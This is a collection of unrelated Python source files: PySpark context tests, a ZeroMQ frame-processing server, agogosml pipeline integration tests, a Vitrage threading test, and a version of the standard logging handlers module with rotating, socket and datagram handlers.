self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallalize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallalize_temp_files)
def test_set_conf(self):
# This is for an internal use case. When there is an existing SparkContext,
# SparkSession's builder needs to set configs into SparkContext's conf.
sc = SparkContext()
sc._conf.set("spark.test.SPARK16224", "SPARK16224")
self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
sc.stop()
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
# When thread is pinned, job group should be set for each thread for now.
# Local properties seem not being inherited like Scala side does.
if os.environ.get("PYSPARK_PIN_THREAD", "false").lower() == "true":
sc.setJobGroup('test_progress_api', '', True)
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
def test_forbid_insecure_gateway(self):
# Fail immediately if you try to create a SparkContext
# with an insecure gateway
parameters = namedtuple('MockGatewayParameters', 'auth_token')(None)
mock_insecure_gateway = namedtuple('MockJavaGateway', 'gateway_parameters')(parameters)
with self.assertRaises(ValueError) as context:
SparkContext(gateway=mock_insecure_gateway)
self.assertIn("insecure Py4j gateway", str(context.exception))
def test_resources(self):
"""Test the resources are empty by default."""
with SparkContext() as sc:
resources = sc.resources
self.assertEqual(len(resources), 0)
def test_disallow_to_create_spark_context_in_executors(self):
# SPARK-32160: SparkContext should not be created in executors.
with SparkContext("local-cluster[3, 1, 1024]") as sc:
with self.assertRaises(Exception) as context:
sc.range(2).foreach(lambda _: SparkContext())
self.assertIn("SparkContext should only be created and accessed on the driver.",
str(context.exception))
class ContextTestsWithResources(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
self.tempFile = tempfile.NamedTemporaryFile(delete=False)
self.tempFile.write(b'echo {\\"name\\": \\"gpu\\", \\"addresses\\": [\\"0\\"]}')
self.tempFile.close()
os.chmod(self.tempFile.name, stat.S_IRWXU | stat.S_IXGRP | stat.S_IRGRP |
stat.S_IROTH | stat.S_IXOTH)
conf = SparkConf().set("spark.test.home", SPARK_HOME)
conf = conf.set("spark.driver.resource.gpu.amount", "1")
conf = conf.set("spark.driver.resource.gpu.discoveryScript", self.tempFile.name)
self.sc = SparkContext('local-cluster[2,1,1024]', class_name, conf=conf)
def test_resources(self):
"""Test the resources are available."""
resources = self.sc.resources
self.assertEqual(len(resources), 1)
self.assertTrue('gpu' in resources)
self.assertEqual(resources['gpu'].name, 'gpu')
self.assertEqual(resources['gpu'].addresses, ['0'])
def tearDown(self):
os.unlink(self.tempFile.name)
self.sc.stop()
if __name__ == "__main__":
from pyspark.tests.test_context import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
server.py
|
import base64
import cv2
import zmq
import numpy as np
import threading
def face_model_fit(id):
# TODO: add code here to train/update the face model for this id
print("fit :", id)
def process(recv_socket):
while True:
frame = recv_socket.recv_string()
data = frame.split(":")
header = data[0]
if header == "fit":
id = data[1]
face_model_fit(id)
def face_model(recv_socket, send_socket):
while True:
frame = recv_socket.recv_string()
img = base64.b64decode(frame)
np_img = np.frombuffer(img, dtype=np.uint8)
source = cv2.imdecode(np_img, 1)
# TODO: write the model code (for now the frame is simply converted to grayscale)
gray_frame = cv2.cvtColor(source, cv2.COLOR_BGR2GRAY)
encoded, buffer = cv2.imencode(".jpg", gray_frame)
jpg_as_text = base64.b64encode(buffer)
send_socket.send(jpg_as_text)
context = zmq.Context()
send_socket = context.socket(zmq.PUB)
send_socket.bind("tcp://*:5000")
recv_socket = context.socket(zmq.SUB)
recv_socket.connect("tcp://192.168.0.14:4000") # 라즈베리파이 ip
recv_socket.setsockopt_string(zmq.SUBSCRIBE, "")
recv_socket2 = context.socket(zmq.SUB)
recv_socket2.connect("tcp://localhost:6000")
recv_socket2.setsockopt_string(zmq.SUBSCRIBE, "")
face_model_thread = threading.Thread(target=face_model, args=(recv_socket, send_socket))
process_thread = threading.Thread(target=process, args=(recv_socket2,))
face_model_thread.start()
process_thread.start()
|
test_integration_input_app_output.py
|
import datetime
import threading
import pytest
import os
import time
from dotenv import load_dotenv
from agogosml.common.kafka_streaming_client import KafkaStreamingClient
from agogosml.reader.input_reader_factory import InputReaderFactory
from agogosml.writer.output_writer_factory import OutputWriterFactory
from tests.client_mocks import StreamingClientMock, HttpClientMock
from tests.integration_tests.test_app import TestApp
load_dotenv()
@pytest.fixture
def mock_streaming_client():
return StreamingClientMock()
@pytest.fixture
def mock_listener_client():
return HttpClientMock({'PORT': 0})
@pytest.mark.integration
def test_when_messages_received_in_input_then_all_messages_are_sent_via_output():
"""
This function tests the integration of input and output.
It assumes connectivity to the streaming client is correct, therefore the streaming client is mocked.
We check that once a message is received, it is sent out by the output writer.
This is the maximal integration test we can have in an isolated environment.
:return:
"""
# setup input
input_client_mock = StreamingClientMock()
ir_config = {
'APP_PORT': os.getenv("APP_PORT"),
'APP_HOST': os.getenv("APP_HOST"),
}
print('Creating reader')
ir = InputReaderFactory.create(ir_config, input_client_mock)
print('start_receiving_messages')
ir.start_receiving_messages()
# setup app
app = TestApp(os.getenv("APP_PORT"),
os.getenv("APP_HOST"),
os.getenv("OUTPUT_WRITER_PORT"),
os.getenv("OUTPUT_WRITER_HOST"))
app.start()
# setup output
ow_config = {
'OUTPUT_WRITER_PORT': os.getenv("OUTPUT_WRITER_PORT"),
'OUTPUT_WRITER_HOST': os.getenv("OUTPUT_WRITER_HOST"),
}
print('Creating writer')
output_client_mock = StreamingClientMock()
ow = OutputWriterFactory.create(ow_config, output_client_mock, None)
print('start_incoming_messages')
ow.start_incoming_messages()
print('sending test message to reader')
test_msg = str(time.perf_counter())
# send a message from INPUT reader, and expect it to flow in the pipeline,
# and eventually be picked up by the output writer
input_client_mock.fake_incoming_message_from_streaming(test_msg)
last_msg = output_client_mock.get_last_msg()
assert last_msg == test_msg
ir.stop_incoming_messages()
ow.stop_incoming_messages()
@pytest.mark.integration
def test_when_error_in_output_then_pipeline_fails():
"""
This function tests the integration of input and output.
It assumes connectivity to the streaming client is correct, therefore the streaming client is mocked.
We check that when the output writer fails to send, the failure propagates back to the input reader.
This is the maximal integration test we can have in an isolated environment.
:return:
"""
# setup input
input_client_mock = StreamingClientMock()
ir_config = {
'APP_PORT': os.getenv("APP_PORT"),
'APP_HOST': os.getenv("APP_HOST"),
}
print('Creating reader')
ir = InputReaderFactory.create(ir_config, input_client_mock)
print('start_receiving_messages')
ir.start_receiving_messages()
# setup app
app = TestApp(os.getenv("APP_PORT"),
os.getenv("APP_HOST"),
os.getenv("OUTPUT_WRITER_PORT"),
os.getenv("OUTPUT_WRITER_HOST"))
app.start()
# setup output
ow_config = {
'OUTPUT_WRITER_PORT': os.getenv("OUTPUT_WRITER_PORT"),
'OUTPUT_WRITER_HOST': os.getenv("OUTPUT_WRITER_HOST"),
}
print('Creating writer')
output_client_mock = StreamingClientMock()
ow = OutputWriterFactory.create(ow_config, output_client_mock, None)
print('start_incoming_messages')
# Set to fail on Output Send:
output_client_mock.set_fail_send(True)
print('sending test message to reader')
test_msg = str(time.perf_counter())
# send a message from INPUT reader, and expect it to flow in the pipeline,
# and eventually be picked up by the output writer
result = input_client_mock.fake_incoming_message_from_streaming(test_msg)
last_msg = output_client_mock.get_last_msg()
assert last_msg is None
assert result is False
ir.stop_incoming_messages()
ow.stop_incoming_messages()
@pytest.mark.integration
def test_when_messages_sent_to_kafka_then_all_messages_are_sent_via_output():
"""
This function tests the integration of input and output.
This test uses a real Kafka streaming client, so it requires connectivity to the broker configured in the environment.
We check that a message produced to the input topic flows through the pipeline and is sent out by the output writer.
This is the maximal integration test we can have in an isolated environment.
Please allow KAFKA_TIMEOUT of 30 seconds or more
:return:
"""
# setup input
ir_config = {
'client': {
'type': 'kafka',
'config': {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_INPUT"),
"KAFKA_CONSUMER_GROUP": os.getenv("KAFKA_CONSUMER_GROUP"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
"EVENT_HUB_KAFKA_CONNECTION_STRING": os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
},
'APP_PORT': os.getenv("APP_PORT"),
'APP_HOST': os.getenv("APP_HOST"),
}
print('Creating reader')
ir = InputReaderFactory.create(ir_config)
# setup app
app = TestApp(os.getenv("APP_PORT"),
os.getenv("APP_HOST"),
os.getenv("OUTPUT_WRITER_PORT"),
os.getenv("OUTPUT_WRITER_HOST"))
app.start()
# setup output
ow_config = {
'client': {
'type': 'kafka',
'config': {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_OUTPUT"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
'EVENT_HUB_KAFKA_CONNECTION_STRING': os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
},
'OUTPUT_WRITER_PORT': os.getenv("OUTPUT_WRITER_PORT"),
'OUTPUT_WRITER_HOST': os.getenv("OUTPUT_WRITER_HOST"),
}
print('Creating writer')
ow = OutputWriterFactory.create(ow_config, None, None)
print('start_incoming_messages')
ow.start_incoming_messages()
print('start_receiving_messages')
# ir.start_receiving_messages()
t_ir = threading.Thread(name='testir', target=ir.start_receiving_messages)
t_ir.daemon = True
t_ir.start()
print('sending test message to reader')
test_msg = str(time.perf_counter())
print("sending %s to input topic" % test_msg)
# send a message from INPUT reader, and expect it to flow in the pipeline,
# and eventually be picked up by the output writer
send_message_to_kafka(test_msg)
last_msg = read_message_from_kafka()
print("received %s from output topic" % last_msg)
assert last_msg == test_msg
ir.stop_incoming_messages()
ow.stop_incoming_messages()
def send_message_to_kafka(msg):
config = {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_OUTPUT"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
"EVENT_HUB_KAFKA_CONNECTION_STRING": os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
kafka = KafkaStreamingClient(config)
val = kafka.send(msg)
return val
def read_message_from_kafka():
config = {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_INPUT"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"KAFKA_CONSUMER_GROUP": os.getenv("KAFKA_CONSUMER_GROUP"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
"EVENT_HUB_KAFKA_CONNECTION_STRING": os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
kafka = KafkaStreamingClient(config)
kafka.start_receiving(on_msg)
start = datetime.datetime.now()
timeout = int(os.getenv("KAFKA_TIMEOUT"))
stop = False
msg = None
while not stop:
# Stop loop after timeout if exists
elapsed = datetime.datetime.now() - start
if elapsed.seconds >= timeout:
stop = True
# Poll messages from topic
if my_msg is not None:
stop = True
msg = my_msg
return msg
my_msg = None
def on_msg(msg):
global my_msg
my_msg = msg.decode('utf-8')
|
test_processor_service.py
|
# Copyright 2017 - Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from vitrage.entity_graph.graph_init import EventsCoordination
from vitrage.tests import base
class EventsCoordinationTest(base.BaseTest):
@classmethod
def setUpClass(cls):
super(EventsCoordinationTest, cls).setUpClass()
cls.calc_result = 0
def do_work(self, x):
if x:
self.calc_result = self.calc_result * 2
else:
self.calc_result = self.calc_result + 1
def test_queue_coordination(self):
explain = """
initially calc_result is 0.
each high priority call multiplies by *2
each low priority call adds +1
so, if all the high calls are performed first, and then all the low,
the result should be the number of low priority calls.
0*(2^n) + 1*n
"""
priority_listener = EventsCoordination(None, self.do_work)
def write_high():
for i in range(10000):
priority_listener._do_high_priority_work(True)
def write_low():
for i in range(10000):
priority_listener._do_low_priority_work(False)
self.calc_result = 0
t1 = threading.Thread(name='high_1', target=write_high)
t2 = threading.Thread(name='high_2', target=write_high)
t3 = threading.Thread(name='low_1', target=write_low)
t4 = threading.Thread(name='low_2', target=write_low)
self._start_and_join(t1, t2, t3, t4)
self.assertEqual(20000, self.calc_result, explain)
self.calc_result = 0
t1 = threading.Thread(name='high_1', target=write_high)
t2 = threading.Thread(name='low_1', target=write_low)
t3 = threading.Thread(name='low_2', target=write_low)
t4 = threading.Thread(name='high_2', target=write_high)
self._start_and_join(t1, t2, t3, t4)
self.assertEqual(20000, self.calc_result, explain)
def _start_and_join(self, *args):
for t in args:
t.start()
for t in args:
t.join()
|
handlers.py
|
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError:
threading = None
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename('%s.%d' % (self.baseFilename, i))
dfn = self.rotation_filename('%s.%d' % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + '.1')
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None:
self.stream = self._open()
if self.maxBytes > 0:
msg = '%s\n' % self.format(record)
self.stream.seek(0, 2)
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
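# Usage sketch (illustrative, not part of this module): rotate at roughly 1 MB and
# keep three backups, producing app.log, app.log.1, app.log.2 and app.log.3.
#
#   demo_logger = logging.getLogger("rotating-demo")
#   demo_logger.addHandler(RotatingFileHandler("app.log", maxBytes=1000000,
#                                               backupCount=3))
#   demo_logger.warning("something worth keeping")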
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
if self.when == 'S':
self.interval = 1
self.suffix = '%Y-%m-%d_%H-%M-%S'
self.extMatch = (
'^\\d{4}-\\d{2}-\\d{2}_\\d{2}-\\d{2}-\\d{2}(\\.\\w+)?$')
elif self.when == 'M':
self.interval = 60
self.suffix = '%Y-%m-%d_%H-%M'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}_\\d{2}-\\d{2}(\\.\\w+)?$'
elif self.when == 'H':
self.interval = 60 * 60
self.suffix = '%Y-%m-%d_%H'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}_\\d{2}(\\.\\w+)?$'
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24
self.suffix = '%Y-%m-%d'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}(\\.\\w+)?$'
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7
if len(self.when) != 2:
raise ValueError(
'You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s'
% self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError(
'Invalid day specified for weekly rollover: %s' % self.when
)
self.dayOfWeek = int(self.when[1])
self.suffix = '%Y-%m-%d'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}(\\.\\w+)?$'
else:
raise ValueError('Invalid rollover interval specified: %s' %
self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = (self.atTime.hour * 60 + self.atTime.minute
) * 60 + self.atTime.second
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
if self.when.startswith('W'):
day = currentDay
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + daysToWait * (60 * 60 * 24)
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow:
addend = -3600
else:
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
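# Worked example (illustrative): with when='MIDNIGHT', atTime=None and a local
# currentTime of 14:30:00, rotate_ts is _MIDNIGHT (86400) and the seconds elapsed
# since local midnight are (14*60 + 30)*60 = 52200, so r = 86400 - 52200 = 34200
# and the first rollover lands exactly on the next local midnight.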
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + '.'
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + '.' + time.
strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
if (self.when == 'MIDNIGHT' or self.when.startswith('W')
) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow:
addend = -3600
else:
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
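# Usage sketch (illustrative, not part of this module): roll the log over at local
# midnight and keep a week of backups; rotated files take the %Y-%m-%d suffix, e.g.
# app.log.2016-01-01 ... app.log.2016-01-07.
#
#   demo_handler = TimedRotatingFileHandler("app.log", when="midnight", backupCount=7)
#   logging.getLogger("timed-demo").addHandler(demo_handler)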
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
try:
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
self.stream.flush()
self.stream.close()
self.stream = None
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = host, port
self.sock = None
self.closeOnError = False
self.retryTime = None
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close()
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
if self.retryTime is None:
attempt = True
else:
attempt = now >= self.retryTime
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None
except OSError:
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
if self.sock:
try:
self.sock.sendall(s)
except OSError:
self.sock.close()
self.sock = None
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
dummy = self.format(record)
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack('>L', len(s))
return slen + s
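# Receiving-end sketch (illustrative, not part of the handler): each payload is a
# 4-byte big-endian length prefix followed by the pickled LogRecord dict, so a
# listener can rebuild records roughly like this (`conn` is an assumed, already
# connected stream socket; a robust reader would also loop until slen bytes arrive):
#
#   slen = struct.unpack('>L', conn.recv(4))[0]
#   record = logging.makeLogRecord(pickle.loads(conn.recv(slen)))
#   logging.getLogger(record.name).handle(record)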
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
